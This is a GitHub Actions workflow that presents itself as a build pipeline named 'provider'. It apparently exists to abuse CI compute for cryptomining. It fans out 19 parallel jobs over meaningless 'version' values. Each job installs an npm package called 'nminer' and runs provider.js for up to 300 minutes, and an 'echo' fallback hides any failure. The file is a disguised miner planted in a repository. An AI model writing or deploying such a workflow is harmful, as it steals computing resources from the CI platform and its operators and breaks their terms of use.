name: provider
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 4874 }
          - { version: 5292 }
          - { version: 1018 }
          - { version: 1254 }
          - { version: 683 }
          - { version: 3 }
          - { version: 688 }
          - { version: 9214 }
          - { version: 5960 }
          - { version: 3696 }
          - { version: 2764 }
          - { version: 727 }
          - { version: 6889 }
          - { version: 8521 }
          - { version: 9928 }
          - { version: 2990 }
          - { version: 3131 }
          - { version: 9545 }
          - { version: 7116 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: front
        run: |
          npm install nminer@latest
          timeout 300m node provider.js || echo "provider executed"